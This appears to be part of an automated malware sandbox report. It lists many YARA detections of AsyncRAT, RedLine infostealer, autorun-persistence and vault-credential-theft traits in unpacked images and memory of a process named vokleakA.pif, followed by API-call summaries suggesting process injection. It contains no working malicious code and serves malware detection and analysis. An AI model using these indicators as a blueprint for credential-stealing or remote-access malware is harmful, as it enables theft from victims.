Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000007.00000001.2149766444.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000009.00000002.2300614392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000004.00000002.3232986846.000000003206C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000007.00000002.2218197846.0000000024381000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000009.00000001.2234454714.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000007.00000002.2200611596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000004.00000002.3229902141.000000002FEF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000002.2219281239.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000009.00000002.2320481183.0000000031EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: vokleakA.pif PID: 3716, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: vokleakA.pif PID: 6096, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: vokleakA.pif PID: 2072, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0415CA40 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,	0_2_0415CA40
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0415B5FC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_0415B5FC
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0415B684 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_0415B684
Source: C:\Users\user\Desktop\PCMNil7wkU.exe	Code function: 0_2_0415B768 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_0415B768
